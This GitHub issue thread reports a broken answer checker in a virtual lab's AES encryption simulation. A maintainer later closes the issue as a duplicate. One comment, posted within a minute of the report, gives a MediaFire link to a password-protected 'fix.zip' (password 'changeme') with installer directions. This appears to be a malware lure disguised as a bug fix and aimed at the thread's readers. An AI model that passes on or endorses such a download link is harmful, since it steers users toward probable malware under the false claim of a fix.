### ISSUE TITLE
[BUG REPORT] Virtual Labs Symmetric Key Encryption Standards (AES)

### ISSUE THREAD

**Issue by vlabs-bug** [virtual-labs/bugs-virtual-labs#1410] opened 2024-08-26 04:28 UTC
### **Bug Reported on 26 August, 9:58 GMT +5:50 in** 
Lab - Cryptography
Experiment - Symmetric Key Encryption Standards (AES)
**Type(s) of Issue -**
* Incorrect Results/Observations
* Simulation Not Working

Additional info- Answer is not checked

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Experiment Link - https://cse29-iiith.vlabs.ac.in/exp/aes/simulation.html

**Comment by Wanderx13** [comment] 2024-08-26 04:28
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shraddha** [comment] 2024-11-19 15:15
Closing it, as it is duplicate of https://github.com/virtual-labs/bugs-virtual-labs/issues/220

**Closed by shraddha** 2024-11-19 15:15 UTC
Labels: duplicate, IIITH
